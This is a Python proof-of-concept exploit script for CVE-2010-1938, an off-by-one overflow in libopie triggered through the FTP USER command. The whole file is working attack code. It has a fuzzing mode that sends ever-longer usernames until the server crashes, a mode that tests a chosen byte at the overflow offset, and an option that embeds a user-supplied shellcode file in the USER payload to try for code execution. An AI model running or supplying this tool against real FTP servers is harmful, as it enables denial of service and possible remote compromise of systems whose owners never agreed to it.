#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Improved PoC for CVE-2010-1938 Author: Nexxus67 """ import argparse from contextlib import closing from dataclasses import dataclass from itertools import cycle import socket import time from typing import Optional, Tuple # ---------------------------------------------------------------------- # Default configuration (can be modified via arguments) DEFAULT_IP = "your-target-ip" DEFAULT_PORT = 21 DEFAULT_TIMEOUT = 5 RECV_BUFFER = 1024 # ---------------------------------------------------------------------- PayloadResult = Tuple[Optional[bytes], Optional[bytes]] @dataclass(frozen=True) class TargetConfig: """Immutable configuration for the FTP target.""" ip: str port: int = DEFAULT_PORT timeout: float = DEFAULT_TIMEOUT buffer_size: int = RECV_BUFFER def decode_bytes(data: Optional[bytes]) -> str: """Safely decode bytes ignoring unexpected unicode errors.""" if not data: return "(no data)" return data.decode(errors="ignore").strip() class ExploitClient: """Wraps the target configuration and common FTP helper routines.""" def __init__(self, config: TargetConfig) -> None: self.config = config def _open_socket(self, timeout: Optional[float] = None) -> socket.socket: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(timeout if timeout is not None else self.config.timeout) sock.connect((self.config.ip, self.config.port)) return sock def send_payload(self, payload: bytes) -> PayloadResult: """Send a USER payload and return the banner and response.""" try: with closing(self._open_socket()) as sock: banner = sock.recv(self.config.buffer_size) sock.sendall(b"USER " + payload + b"\r\n") response = sock.recv(self.config.buffer_size) return banner, response except OSError as exc: print(f"[-] Payload failed: {exc}") return None, None def is_service_alive(self, timeout: Optional[float] = None) -> bool: """Check if the FTP service accepts a connection within the timeout.""" try: with closing(self._open_socket(timeout=timeout)): return True except OSError: return False def check_crash(client: ExploitClient, timeout: float = 2.0) -> bool: """Return True if the target refuses new connections (likely crashed).""" return not client.is_service_alive(timeout=timeout) def generate_pattern(length: int) -> bytes: """Produce a cyclic pattern for manual offset hunting.""" upper = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ" lower = b"abcdefghijklmnopqrstuvwxyz" digits = b"0123456789" pattern = bytearray() for a, b, c in zip(cycle(upper), cycle(lower), cycle(digits)): pattern.extend((a, b, c)) if len(pattern) >= length: return bytes(pattern[:length]) return bytes(pattern) def fuzz_length(client: ExploitClient, start: int = 200, end: int = 400, step: int = 1) -> Optional[int]: """Sweep username lengths and return the first size that crashes the service.""" print(f"[*] Fuzzing lengths from {start} to {end} (step {step})") for size in range(start, end + 1, step): payload = b"A" * size print(f"[*] Testing length {size}... ", end="", flush=True) banner, _ = client.send_payload(payload) if banner is None: print("[!] Unable to deliver payload. Stopping fuzzing.") return None if check_crash(client): print("CRASH detected!") return size print("OK") time.sleep(0.5) print("[!] No crash detected in the tested range.") return None def test_critical_byte(client: ExploitClient, critical_length: int, byte: bytes = b"\x00") -> bool: """Exercise the off-by-one byte at the given length to see if it crashes.""" payload = b"A" * (critical_length - 1) + byte print(f"[*] Testing critical byte: {byte.hex()} (length {critical_length})") banner, response = client.send_payload(payload) print(f"[+] Banner: {decode_bytes(banner)}") if response: print(f"[+] USER response: {decode_bytes(response)}") if check_crash(client): print("[!!!] CRASH detected! The critical byte affects the service.") return True print("[-] Service is still alive.") return False def send_shellcode(client: ExploitClient, shellcode: bytes, payload_length: int) -> None: """Embed the provided shellcode inside the USER payload for experimentation.""" if payload_length <= len(shellcode): print("[-] Payload length must be larger than the shellcode size.") return payload = shellcode + b"A" * (payload_length - len(shellcode)) banner, response = client.send_payload(payload) print(f"[+] Banner: {decode_bytes(banner)}") print(f"[+] USER response: {decode_bytes(response)}") if check_crash(client): print("[!!!] Service crashed. Possible execution (context dependent).") else: print("[-] Service is still alive.") def main() -> None: parser = argparse.ArgumentParser(description="Improved PoC for CVE-2010-1938 (off-by-one in libopie)") parser.add_argument("ip", nargs="?", default=DEFAULT_IP, help="FTP server IP") parser.add_argument("-p", "--port", type=int, default=DEFAULT_PORT, help="FTP port (default: 21)") parser.add_argument("--fuzz", action="store_true", help="Fuzzing mode: find length causing crash") parser.add_argument("--byte-test", metavar="BYTE", help="Test a specific byte (e.g., 00, ff) at critical position") parser.add_argument("--shellcode", metavar="FILE", help="File containing binary shellcode to send (experimental)") parser.add_argument("--length", type=int, help="Payload length for --byte-test or --shellcode") args = parser.parse_args() client = ExploitClient(TargetConfig(ip=args.ip, port=args.port)) if args.fuzz: print("[*] Fuzzing mode") critical_length = fuzz_length(client) if critical_length: print(f"\n[+] Critical length found: {critical_length}") elif args.byte_test: if not args.length: print("[-] --byte-test requires --length") return byte = bytes.fromhex(args.byte_test) test_critical_byte(client, args.length, byte) elif args.shellcode: if not args.length: print("[-] --shellcode requires --length") return with open(args.shellcode, "rb") as payload_file: shellcode = payload_file.read() send_shellcode(client, shellcode, args.length) else: print("[*] No specific arguments. Running quick test with typical lengths...") lengths = [256, 257, 258, 300, 400] for length in lengths: payload = b"A" * length print(f"\n[*] Testing length {length}") banner, response = client.send_payload(payload) print(f"[+] Banner: {decode_bytes(banner)}") if response: print(f"[+] Response: {decode_bytes(response)}") if banner is None and response is None: print("[!] Payload delivery failed during demo run. Stopping.") break if check_crash(client): print("[!!!] CRASH detected!") break print("[-] Server responds normally.") time.sleep(1) if __name__ == "__main__": main()